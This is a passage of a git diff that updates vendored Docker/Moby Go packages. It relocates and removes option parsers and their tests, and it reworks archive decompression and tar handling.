+build !windows -package opts +package opts // import "github.com/docker/docker/opts" -// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. docker daemon -H tcp://:8080 +// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. dockerd -H tcp://:8080 const DefaultHTTPHost = "localhost" diff --git a/vendor/github.com/docker/docker/opts/opts_windows.go b/vendor/github.com/docker/docker/opts/opts_windows.go index ebe40c969c..0e1b6c6d18 100644 --- a/vendor/github.com/docker/docker/opts/opts_windows.go +++ b/vendor/github.com/docker/docker/opts/opts_windows.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" // TODO Windows. Identify bug in GOLang 1.5.1+ and/or Windows Server 2016 TP5. // @jhowardmsft, @swernli. @@ -52,5 +52,5 @@ package opts // to the delay if a user were to do 'docker run -H=tcp://localhost:2375...' // explicitly. -// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. docker daemon -H tcp://:8080 +// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. dockerd -H tcp://:8080 const DefaultHTTPHost = "127.0.0.1" diff --git a/vendor/github.com/docker/docker/opts/port.go b/vendor/github.com/docker/docker/opts/port.go deleted file mode 100644 index 020a5d1e1c..0000000000 --- a/vendor/github.com/docker/docker/opts/port.go +++ /dev/null @@ -1,146 +0,0 @@ -package opts - -import ( - "encoding/csv" - "fmt" - "regexp" - "strconv" - "strings" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/go-connections/nat" -) - -const ( - portOptTargetPort = "target" - portOptPublishedPort = "published" - portOptProtocol = "protocol" - portOptMode = "mode" -) - -// PortOpt represents a port config in swarm mode. 
-type PortOpt struct { - ports []swarm.PortConfig -} - -// Set a new port value -func (p *PortOpt) Set(value string) error { - longSyntax, err := regexp.MatchString(`\w+=\w+(,\w+=\w+)*`, value) - if err != nil { - return err - } - if longSyntax { - csvReader := csv.NewReader(strings.NewReader(value)) - fields, err := csvReader.Read() - if err != nil { - return err - } - - pConfig := swarm.PortConfig{} - for _, field := range fields { - parts := strings.SplitN(field, "=", 2) - if len(parts) != 2 { - return fmt.Errorf("invalid field %s", field) - } - - key := strings.ToLower(parts[0]) - value := strings.ToLower(parts[1]) - - switch key { - case portOptProtocol: - if value != string(swarm.PortConfigProtocolTCP) && value != string(swarm.PortConfigProtocolUDP) { - return fmt.Errorf("invalid protocol value %s", value) - } - - pConfig.Protocol = swarm.PortConfigProtocol(value) - case portOptMode: - if value != string(swarm.PortConfigPublishModeIngress) && value != string(swarm.PortConfigPublishModeHost) { - return fmt.Errorf("invalid publish mode value %s", value) - } - - pConfig.PublishMode = swarm.PortConfigPublishMode(value) - case portOptTargetPort: - tPort, err := strconv.ParseUint(value, 10, 16) - if err != nil { - return err - } - - pConfig.TargetPort = uint32(tPort) - case portOptPublishedPort: - pPort, err := strconv.ParseUint(value, 10, 16) - if err != nil { - return err - } - - pConfig.PublishedPort = uint32(pPort) - default: - return fmt.Errorf("invalid field key %s", key) - } - } - - if pConfig.TargetPort == 0 { - return fmt.Errorf("missing mandatory field %q", portOptTargetPort) - } - - if pConfig.PublishMode == "" { - pConfig.PublishMode = swarm.PortConfigPublishModeIngress - } - - if pConfig.Protocol == "" { - pConfig.Protocol = swarm.PortConfigProtocolTCP - } - - p.ports = append(p.ports, pConfig) - } else { - // short syntax - portConfigs := []swarm.PortConfig{} - // We can ignore errors because the format was already validated by ValidatePort - ports, 
portBindings, _ := nat.ParsePortSpecs([]string{value}) - - for port := range ports { - portConfigs = append(portConfigs, ConvertPortToPortConfig(port, portBindings)...) - } - p.ports = append(p.ports, portConfigs...) - } - return nil -} - -// Type returns the type of this option -func (p *PortOpt) Type() string { - return "port" -} - -// String returns a string repr of this option -func (p *PortOpt) String() string { - ports := []string{} - for _, port := range p.ports { - repr := fmt.Sprintf("%v:%v/%s/%s", port.PublishedPort, port.TargetPort, port.Protocol, port.PublishMode) - ports = append(ports, repr) - } - return strings.Join(ports, ", ") -} - -// Value returns the ports -func (p *PortOpt) Value() []swarm.PortConfig { - return p.ports -} - -// ConvertPortToPortConfig converts ports to the swarm type -func ConvertPortToPortConfig( - port nat.Port, - portBindings map[nat.Port][]nat.PortBinding, -) []swarm.PortConfig { - ports := []swarm.PortConfig{} - - for _, binding := range portBindings[port] { - hostPort, _ := strconv.ParseUint(binding.HostPort, 10, 16) - ports = append(ports, swarm.PortConfig{ - //TODO Name: ? 
- Protocol: swarm.PortConfigProtocol(strings.ToLower(port.Proto())), - TargetPort: uint32(port.Int()), - PublishedPort: uint32(hostPort), - PublishMode: swarm.PortConfigPublishModeIngress, - }) - } - return ports -} diff --git a/vendor/github.com/docker/docker/opts/port_test.go b/vendor/github.com/docker/docker/opts/port_test.go deleted file mode 100644 index 67bcf8f1d9..0000000000 --- a/vendor/github.com/docker/docker/opts/port_test.go +++ /dev/null @@ -1,259 +0,0 @@ -package opts - -import ( - "testing" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestPortOptValidSimpleSyntax(t *testing.T) { - testCases := []struct { - value string - expected []swarm.PortConfig - }{ - { - value: "80", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "80:8080", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 8080, - PublishedPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "8080:80/tcp", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 80, - PublishedPort: 8080, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "80:8080/udp", - expected: []swarm.PortConfig{ - { - Protocol: "udp", - TargetPort: 8080, - PublishedPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "80-81:8080-8081/tcp", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 8080, - PublishedPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - { - Protocol: "tcp", - TargetPort: 8081, - PublishedPort: 81, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "80-82:8080-8082/udp", - expected: []swarm.PortConfig{ - { - Protocol: "udp", - TargetPort: 8080, - PublishedPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - { - Protocol: "udp", - 
TargetPort: 8081, - PublishedPort: 81, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - { - Protocol: "udp", - TargetPort: 8082, - PublishedPort: 82, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - } - for _, tc := range testCases { - var port PortOpt - assert.NilError(t, port.Set(tc.value)) - assert.Equal(t, len(port.Value()), len(tc.expected)) - for _, expectedPortConfig := range tc.expected { - assertContains(t, port.Value(), expectedPortConfig) - } - } -} - -func TestPortOptValidComplexSyntax(t *testing.T) { - testCases := []struct { - value string - expected []swarm.PortConfig - }{ - { - value: "target=80", - expected: []swarm.PortConfig{ - { - TargetPort: 80, - Protocol: "tcp", - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "target=80,protocol=tcp", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "target=80,published=8080,protocol=tcp", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 80, - PublishedPort: 8080, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "published=80,target=8080,protocol=tcp", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 8080, - PublishedPort: 80, - PublishMode: swarm.PortConfigPublishModeIngress, - }, - }, - }, - { - value: "target=80,published=8080,protocol=tcp,mode=host", - expected: []swarm.PortConfig{ - { - Protocol: "tcp", - TargetPort: 80, - PublishedPort: 8080, - PublishMode: "host", - }, - }, - }, - { - value: "target=80,published=8080,mode=host", - expected: []swarm.PortConfig{ - { - TargetPort: 80, - PublishedPort: 8080, - PublishMode: "host", - Protocol: "tcp", - }, - }, - }, - { - value: "target=80,published=8080,mode=ingress", - expected: []swarm.PortConfig{ - { - TargetPort: 80, - PublishedPort: 8080, - PublishMode: "ingress", - Protocol: "tcp", - }, - }, - }, - } - for _, tc := range 
testCases { - var port PortOpt - assert.NilError(t, port.Set(tc.value)) - assert.Equal(t, len(port.Value()), len(tc.expected)) - for _, expectedPortConfig := range tc.expected { - assertContains(t, port.Value(), expectedPortConfig) - } - } -} - -func TestPortOptInvalidComplexSyntax(t *testing.T) { - testCases := []struct { - value string - expectedError string - }{ - { - value: "invalid,target=80", - expectedError: "invalid field", - }, - { - value: "invalid=field", - expectedError: "invalid field", - }, - { - value: "protocol=invalid", - expectedError: "invalid protocol value", - }, - { - value: "target=invalid", - expectedError: "invalid syntax", - }, - { - value: "published=invalid", - expectedError: "invalid syntax", - }, - { - value: "mode=invalid", - expectedError: "invalid publish mode value", - }, - { - value: "published=8080,protocol=tcp,mode=ingress", - expectedError: "missing mandatory field", - }, - { - value: `target=80,protocol="tcp,mode=ingress"`, - expectedError: "non-quoted-field", - }, - { - value: `target=80,"protocol=tcp,mode=ingress"`, - expectedError: "invalid protocol value", - }, - } - for _, tc := range testCases { - var port PortOpt - assert.Error(t, port.Set(tc.value), tc.expectedError) - } -} - -func assertContains(t *testing.T, portConfigs []swarm.PortConfig, expected swarm.PortConfig) { - var contains = false - for _, portConfig := range portConfigs { - if portConfig == expected { - contains = true - break - } - } - if !contains { - t.Errorf("expected %v to contain %v, did not", portConfigs, expected) - } -} diff --git a/vendor/github.com/docker/docker/opts/quotedstring.go b/vendor/github.com/docker/docker/opts/quotedstring.go index fb1e5374bc..6c889070e8 100644 --- a/vendor/github.com/docker/docker/opts/quotedstring.go +++ b/vendor/github.com/docker/docker/opts/quotedstring.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" // QuotedString is a string that may have extra quotes around the value. 
The // quotes are stripped from the value. @@ -18,7 +18,7 @@ func (s *QuotedString) Type() string { } func (s *QuotedString) String() string { - return string(*s.value) + return *s.value } func trimQuotes(value string) string { diff --git a/vendor/github.com/docker/docker/opts/quotedstring_test.go b/vendor/github.com/docker/docker/opts/quotedstring_test.go index 0ebf04bbe0..89fed6cfa6 100644 --- a/vendor/github.com/docker/docker/opts/quotedstring_test.go +++ b/vendor/github.com/docker/docker/opts/quotedstring_test.go @@ -1,28 +1,30 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( - "github.com/docker/docker/pkg/testutil/assert" "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestQuotedStringSetWithQuotes(t *testing.T) { value := "" qs := NewQuotedString(&value) - assert.NilError(t, qs.Set("\"something\"")) - assert.Equal(t, qs.String(), "something") - assert.Equal(t, value, "something") + assert.Check(t, qs.Set(`"something"`)) + assert.Check(t, is.Equal("something", qs.String())) + assert.Check(t, is.Equal("something", value)) } func TestQuotedStringSetWithMismatchedQuotes(t *testing.T) { value := "" qs := NewQuotedString(&value) - assert.NilError(t, qs.Set("\"something'")) - assert.Equal(t, qs.String(), "\"something'") + assert.Check(t, qs.Set(`"something'`)) + assert.Check(t, is.Equal(`"something'`, qs.String())) } func TestQuotedStringSetWithNoQuotes(t *testing.T) { value := "" qs := NewQuotedString(&value) - assert.NilError(t, qs.Set("something")) - assert.Equal(t, qs.String(), "something") + assert.Check(t, qs.Set("something")) + assert.Check(t, is.Equal("something", qs.String())) } diff --git a/vendor/github.com/docker/docker/runconfig/opts/runtime.go b/vendor/github.com/docker/docker/opts/runtime.go similarity index 97% rename from vendor/github.com/docker/docker/runconfig/opts/runtime.go rename to vendor/github.com/docker/docker/opts/runtime.go index 4361b3ce09..4b9babf0a5 100644 --- 
a/vendor/github.com/docker/docker/runconfig/opts/runtime.go +++ b/vendor/github.com/docker/docker/opts/runtime.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" diff --git a/vendor/github.com/docker/docker/opts/secret.go b/vendor/github.com/docker/docker/opts/secret.go deleted file mode 100644 index 1fefcf8434..0000000000 --- a/vendor/github.com/docker/docker/opts/secret.go +++ /dev/null @@ -1,107 +0,0 @@ -package opts - -import ( - "encoding/csv" - "fmt" - "os" - "path/filepath" - "strconv" - "strings" - - "github.com/docker/docker/api/types" -) - -// SecretOpt is a Value type for parsing secrets -type SecretOpt struct { - values []*types.SecretRequestOption -} - -// Set a new secret value -func (o *SecretOpt) Set(value string) error { - csvReader := csv.NewReader(strings.NewReader(value)) - fields, err := csvReader.Read() - if err != nil { - return err - } - - options := &types.SecretRequestOption{ - Source: "", - Target: "", - UID: "0", - GID: "0", - Mode: 0444, - } - - // support a simple syntax of --secret foo - if len(fields) == 1 { - options.Source = fields[0] - options.Target = fields[0] - o.values = append(o.values, options) - return nil - } - - for _, field := range fields { - parts := strings.SplitN(field, "=", 2) - key := strings.ToLower(parts[0]) - - if len(parts) != 2 { - return fmt.Errorf("invalid field '%s' must be a key=value pair", field) - } - - value := parts[1] - switch key { - case "source", "src": - options.Source = value - case "target": - tDir, _ := filepath.Split(value) - if tDir != "" { - return fmt.Errorf("target must not be a path") - } - options.Target = value - case "uid": - options.UID = value - case "gid": - options.GID = value - case "mode": - m, err := strconv.ParseUint(value, 0, 32) - if err != nil { - return fmt.Errorf("invalid mode specified: %v", err) - } - - options.Mode = os.FileMode(m) - default: - if len(fields) == 1 && value == "" { - - } else { - return 
fmt.Errorf("invalid field in secret request: %s", key) - } - } - } - - if options.Source == "" { - return fmt.Errorf("source is required") - } - - o.values = append(o.values, options) - return nil -} - -// Type returns the type of this option -func (o *SecretOpt) Type() string { - return "secret" -} - -// String returns a string repr of this option -func (o *SecretOpt) String() string { - secrets := []string{} - for _, secret := range o.values { - repr := fmt.Sprintf("%s -> %s", secret.Source, secret.Target) - secrets = append(secrets, repr) - } - return strings.Join(secrets, ", ") -} - -// Value returns the secret requests -func (o *SecretOpt) Value() []*types.SecretRequestOption { - return o.values -} diff --git a/vendor/github.com/docker/docker/opts/secret_test.go b/vendor/github.com/docker/docker/opts/secret_test.go deleted file mode 100644 index d978c86e22..0000000000 --- a/vendor/github.com/docker/docker/opts/secret_test.go +++ /dev/null @@ -1,79 +0,0 @@ -package opts - -import ( - "os" - "testing" - - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestSecretOptionsSimple(t *testing.T) { - var opt SecretOpt - - testCase := "app-secret" - assert.NilError(t, opt.Set(testCase)) - - reqs := opt.Value() - assert.Equal(t, len(reqs), 1) - req := reqs[0] - assert.Equal(t, req.Source, "app-secret") - assert.Equal(t, req.Target, "app-secret") - assert.Equal(t, req.UID, "0") - assert.Equal(t, req.GID, "0") -} - -func TestSecretOptionsSourceTarget(t *testing.T) { - var opt SecretOpt - - testCase := "source=foo,target=testing" - assert.NilError(t, opt.Set(testCase)) - - reqs := opt.Value() - assert.Equal(t, len(reqs), 1) - req := reqs[0] - assert.Equal(t, req.Source, "foo") - assert.Equal(t, req.Target, "testing") -} - -func TestSecretOptionsShorthand(t *testing.T) { - var opt SecretOpt - - testCase := "src=foo,target=testing" - assert.NilError(t, opt.Set(testCase)) - - reqs := opt.Value() - assert.Equal(t, len(reqs), 1) - req := reqs[0] - assert.Equal(t, 
req.Source, "foo") -} - -func TestSecretOptionsCustomUidGid(t *testing.T) { - var opt SecretOpt - - testCase := "source=foo,target=testing,uid=1000,gid=1001" - assert.NilError(t, opt.Set(testCase)) - - reqs := opt.Value() - assert.Equal(t, len(reqs), 1) - req := reqs[0] - assert.Equal(t, req.Source, "foo") - assert.Equal(t, req.Target, "testing") - assert.Equal(t, req.UID, "1000") - assert.Equal(t, req.GID, "1001") -} - -func TestSecretOptionsCustomMode(t *testing.T) { - var opt SecretOpt - - testCase := "source=foo,target=testing,uid=1000,gid=1001,mode=0444" - assert.NilError(t, opt.Set(testCase)) - - reqs := opt.Value() - assert.Equal(t, len(reqs), 1) - req := reqs[0] - assert.Equal(t, req.Source, "foo") - assert.Equal(t, req.Target, "testing") - assert.Equal(t, req.UID, "1000") - assert.Equal(t, req.GID, "1001") - assert.Equal(t, req.Mode, os.FileMode(0444)) -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/ulimit.go b/vendor/github.com/docker/docker/opts/ulimit.go similarity index 65% rename from vendor/github.com/docker/docker/runconfig/opts/ulimit.go rename to vendor/github.com/docker/docker/opts/ulimit.go index 5adfe30851..0e2a36236c 100644 --- a/vendor/github.com/docker/docker/runconfig/opts/ulimit.go +++ b/vendor/github.com/docker/docker/opts/ulimit.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" @@ -55,3 +55,27 @@ func (o *UlimitOpt) GetList() []*units.Ulimit { func (o *UlimitOpt) Type() string { return "ulimit" } + +// NamedUlimitOpt defines a named map of Ulimits +type NamedUlimitOpt struct { + name string + UlimitOpt +} + +var _ NamedOption = &NamedUlimitOpt{} + +// NewNamedUlimitOpt creates a new NamedUlimitOpt +func NewNamedUlimitOpt(name string, ref *map[string]*units.Ulimit) *NamedUlimitOpt { + if ref == nil { + ref = &map[string]*units.Ulimit{} + } + return &NamedUlimitOpt{ + name: name, + UlimitOpt: *NewUlimitOpt(ref), + } +} + +// Name returns the option name +func (o 
*NamedUlimitOpt) Name() string { + return o.name +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go b/vendor/github.com/docker/docker/opts/ulimit_test.go similarity index 94% rename from vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go rename to vendor/github.com/docker/docker/opts/ulimit_test.go index 0aa3facdfb..41e12627c8 100644 --- a/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go +++ b/vendor/github.com/docker/docker/opts/ulimit_test.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "testing" diff --git a/vendor/github.com/docker/docker/pkg/README.md b/vendor/github.com/docker/docker/pkg/README.md index c4b78a8ad8..755cd96836 100644 --- a/vendor/github.com/docker/docker/pkg/README.md +++ b/vendor/github.com/docker/docker/pkg/README.md @@ -1,8 +1,8 @@ -pkg/ is a collection of utility packages used by the Docker project without being specific to its internals. +pkg/ is a collection of utility packages used by the Moby project without being specific to its internals. -Utility packages are kept separate from the docker core codebase to keep it as small and concise as possible. +Utility packages are kept separate from the moby core codebase to keep it as small and concise as possible. If some utilities grow larger and their APIs stabilize, they may be moved to their own repository under the -Docker organization, to facilitate re-use by other projects. However that is not the priority. +Moby organization, to facilitate re-use by other projects. However that is not the priority. The directory `pkg` is named after the same directory in the camlistore project. Since Brad is a core Go maintainer, we thought it made sense to copy his methods for organizing Go code :) Thanks Brad! 
diff --git a/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go b/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go index ffcc5647a9..9c12e8db8d 100644 --- a/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go +++ b/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go @@ -1,5 +1,5 @@ // Package aaparser is a convenience package interacting with `apparmor_parser`. -package aaparser +package aaparser // import "github.com/docker/docker/pkg/aaparser" import ( "fmt" @@ -22,14 +22,12 @@ func GetVersion() (int, error) { return parseVersion(output) } -// LoadProfile runs `apparmor_parser -r` on a specified apparmor profile to -// replace the profile. +// LoadProfile runs `apparmor_parser -Kr` on a specified apparmor profile to +// replace the profile. The `-K` is necessary to make sure that apparmor_parser +// doesn't try to write to a read-only filesystem. func LoadProfile(profilePath string) error { - _, err := cmd("", "-r", profilePath) - if err != nil { - return err - } - return nil + _, err := cmd("", "-Kr", profilePath) + return err } // cmd runs `apparmor_parser` with the passed arguments. 
@@ -39,7 +37,7 @@ func cmd(dir string, arg ...string) (string, error) { output, err := c.CombinedOutput() if err != nil { - return "", fmt.Errorf("running `%s %s` failed with output: %s\nerror: %v", c.Path, strings.Join(c.Args, " "), string(output), err) + return "", fmt.Errorf("running `%s %s` failed with output: %s\nerror: %v", c.Path, strings.Join(c.Args, " "), output, err) } return string(output), nil diff --git a/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go b/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go index 69bc8d2fd8..6d1f737702 100644 --- a/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go +++ b/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go @@ -1,4 +1,4 @@ -package aaparser +package aaparser // import "github.com/docker/docker/pkg/aaparser" import ( "testing" diff --git a/vendor/github.com/docker/docker/pkg/archive/archive.go b/vendor/github.com/docker/docker/pkg/archive/archive.go index 3261c4f498..daddebded4 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -6,7 +6,7 @@ import ( "bytes" "compress/bzip2" "compress/gzip" - "errors" + "context" "fmt" "io" "io/ioutil" @@ -14,27 +14,35 @@ import ( "os/exec" "path/filepath" "runtime" + "strconv" "strings" "syscall" + "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/pools" - "github.com/docker/docker/pkg/promise" "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" ) +var unpigzPath string + +func init() { + if path, err := exec.LookPath("unpigz"); err != nil { + logrus.Debug("unpigz binary not found in PATH, falling back to go gzip library") + } else { + logrus.Debugf("Using unpigz binary found at 
path %s", path) + unpigzPath = path + } +} + type ( // Compression is the state represents if compressed or not. Compression int // WhiteoutFormat is the format of whiteouts unpacked WhiteoutFormat int - // TarChownOptions wraps the chown options UID and GID. - TarChownOptions struct { - UID, GID int - } // TarOptions wraps the tar options. TarOptions struct { @@ -44,7 +52,7 @@ type ( NoLchown bool UIDMaps []idtools.IDMap GIDMaps []idtools.IDMap - ChownOpts *TarChownOptions + ChownOpts *idtools.IDPair IncludeSourceDir bool // WhiteoutFormat is the expected on disk format for whiteout files. // This format will be converted to the standard format on pack @@ -58,33 +66,25 @@ type ( RebaseNames map[string]string InUserNS bool } - - // Archiver allows the reuse of most utility functions of this package - // with a pluggable Untar function. Also, to facilitate the passing of - // specific id mappings for untar, an archiver can be created with maps - // which will then be passed to Untar operations - Archiver struct { - Untar func(io.Reader, string, *TarOptions) error - UIDMaps []idtools.IDMap - GIDMaps []idtools.IDMap - } - - // breakoutError is used to differentiate errors related to breaking out - // When testing archive breakout in the unit tests, this error is expected - // in order for the test to pass. - breakoutError error ) -var ( - // ErrNotImplemented is the error message of function not implemented. - ErrNotImplemented = errors.New("Function not implemented") - defaultArchiver = &Archiver{Untar: Untar, UIDMaps: nil, GIDMaps: nil} -) +// Archiver implements the Archiver interface and allows the reuse of most utility functions of +// this package with a pluggable Untar function. Also, to facilitate the passing of specific id +// mappings for untar, an Archiver can be created with maps which will then be passed to Untar operations. 
+type Archiver struct { + Untar func(io.Reader, string, *TarOptions) error + IDMappingsVar *idtools.IDMappings +} -const ( - // HeaderSize is the size in bytes of a tar header - HeaderSize = 512 -) +// NewDefaultArchiver returns a new Archiver without any IDMappings +func NewDefaultArchiver() *Archiver { + return &Archiver{Untar: Untar, IDMappingsVar: &idtools.IDMappings{}} +} + +// breakoutError is used to differentiate errors related to breaking out +// When testing archive breakout in the unit tests, this error is expected +// in order for the test to pass. +type breakoutError error const ( // Uncompressed represents the uncompressed. @@ -105,17 +105,15 @@ const ( OverlayWhiteoutFormat ) -// IsArchive checks for the magic bytes of a tar or any supported compression -// algorithm. -func IsArchive(header []byte) bool { - compression := DetectCompression(header) - if compression != Uncompressed { - return true - } - r := tar.NewReader(bytes.NewBuffer(header)) - _, err := r.Next() - return err == nil -} +const ( + modeISDIR = 040000 // Directory + modeISFIFO = 010000 // FIFO + modeISREG = 0100000 // Regular file + modeISLNK = 0120000 // Symbolic link + modeISBLK = 060000 // Block special file + modeISCHR = 020000 // Character special file + modeISSOCK = 0140000 // Socket +) // IsArchivePath checks if the (possibly compressed) file at the given path // starts with a tar file header. 
@@ -129,6 +127,7 @@ func IsArchivePath(path string) bool { if err != nil { return false } + defer rdr.Close() r := tar.NewReader(rdr) _, err = r.Next() return err == nil @@ -145,17 +144,41 @@ func DetectCompression(source []byte) Compression { logrus.Debug("Len too short") continue } - if bytes.Compare(m, source[:len(m)]) == 0 { + if bytes.Equal(m, source[:len(m)]) { return compression } } return Uncompressed } -func xzDecompress(archive io.Reader) (io.ReadCloser, <-chan struct{}, error) { +func xzDecompress(ctx context.Context, archive io.Reader) (io.ReadCloser, error) { args := []string{"xz", "-d", "-c", "-q"} - return cmdStream(exec.Command(args[0], args[1:]...), archive) + return cmdStream(exec.CommandContext(ctx, args[0], args[1:]...), archive) +} + +func gzDecompress(ctx context.Context, buf io.Reader) (io.ReadCloser, error) { + if unpigzPath == "" { + return gzip.NewReader(buf) + } + + disablePigzEnv := os.Getenv("MOBY_DISABLE_PIGZ") + if disablePigzEnv != "" { + if disablePigz, err := strconv.ParseBool(disablePigzEnv); err != nil { + return nil, err + } else if disablePigz { + return gzip.NewReader(buf) + } + } + + return cmdStream(exec.CommandContext(ctx, unpigzPath, "-d", "-c"), buf) +} + +func wrapReadCloser(readBuf io.ReadCloser, cancel context.CancelFunc) io.ReadCloser { + return ioutils.NewReadCloserWrapper(readBuf, func() error { + cancel() + return readBuf.Close() + }) } // DecompressStream decompresses the archive and returns a ReaderCloser with the decompressed archive. 
@@ -179,32 +202,35 @@ func DecompressStream(archive io.Reader) (io.ReadCloser, error) { readBufWrapper := p.NewReadCloserWrapper(buf, buf) return readBufWrapper, nil case Gzip: - gzReader, err := gzip.NewReader(buf) + ctx, cancel := context.WithCancel(context.Background()) + + gzReader, err := gzDecompress(ctx, buf) if err != nil { + cancel() return nil, err } readBufWrapper := p.NewReadCloserWrapper(buf, gzReader) - return readBufWrapper, nil + return wrapReadCloser(readBufWrapper, cancel), nil case Bzip2: bz2Reader := bzip2.NewReader(buf) readBufWrapper := p.NewReadCloserWrapper(buf, bz2Reader) return readBufWrapper, nil case Xz: - xzReader, chdone, err := xzDecompress(buf) + ctx, cancel := context.WithCancel(context.Background()) + + xzReader, err := xzDecompress(ctx, buf) if err != nil { + cancel() return nil, err } readBufWrapper := p.NewReadCloserWrapper(buf, xzReader) - return ioutils.NewReadCloserWrapper(readBufWrapper, func() error { - <-chdone - return readBufWrapper.Close() - }), nil + return wrapReadCloser(readBufWrapper, cancel), nil default: return nil, fmt.Errorf("Unsupported compression format %s", (&compression).Extension()) } } -// CompressStream compresseses the dest with specified compression algorithm. +// CompressStream compresses the dest with specified compression algorithm. func CompressStream(dest io.Writer, compression Compression) (io.WriteCloser, error) { p := pools.BufioWriter32KPool buf := p.Get(dest) @@ -225,6 +251,93 @@ func CompressStream(dest io.Writer, compression Compression) (io.WriteCloser, er } } +// TarModifierFunc is a function that can be passed to ReplaceFileTarWrapper to +// modify the contents or header of an entry in the archive. If the file already +// exists in the archive the TarModifierFunc will be called with the Header and +// a reader which will return the files content. If the file does not exist both +// header and content will be nil. 
+type TarModifierFunc func(path string, header *tar.Header, content io.Reader) (*tar.Header, []byte, error) + +// ReplaceFileTarWrapper converts inputTarStream to a new tar stream. Files in the +// tar stream are modified if they match any of the keys in mods. +func ReplaceFileTarWrapper(inputTarStream io.ReadCloser, mods map[string]TarModifierFunc) io.ReadCloser { + pipeReader, pipeWriter := io.Pipe() + + go func() { + tarReader := tar.NewReader(inputTarStream) + tarWriter := tar.NewWriter(pipeWriter) + defer inputTarStream.Close() + defer tarWriter.Close() + + modify := func(name string, original *tar.Header, modifier TarModifierFunc, tarReader io.Reader) error { + header, data, err := modifier(name, original, tarReader) + switch { + case err != nil: + return err + case header == nil: + return nil + } + + header.Name = name + header.Size = int64(len(data)) + if err := tarWriter.WriteHeader(header); err != nil { + return err + } + if len(data) != 0 { + if _, err := tarWriter.Write(data); err != nil { + return err + } + } + return nil + } + + var err error + var originalHeader *tar.Header + for { + originalHeader, err = tarReader.Next() + if err == io.EOF { + break + } + if err != nil { + pipeWriter.CloseWithError(err) + return + } + + modifier, ok := mods[originalHeader.Name] + if !ok { + // No modifiers for this file, copy the header and data + if err := tarWriter.WriteHeader(originalHeader); err != nil { + pipeWriter.CloseWithError(err) + return + } + if _, err := pools.Copy(tarWriter, tarReader); err != nil { + pipeWriter.CloseWithError(err) + return + } + continue + } + delete(mods, originalHeader.Name) + + if err := modify(originalHeader.Name, originalHeader, modifier, tarReader); err != nil { + pipeWriter.CloseWithError(err) + return + } + } + + // Apply the modifiers that haven't matched any files in the archive + for name, modifier := range mods { + if err := modify(name, nil, modifier, nil); err != nil { + pipeWriter.CloseWithError(err) + return + } + } + 
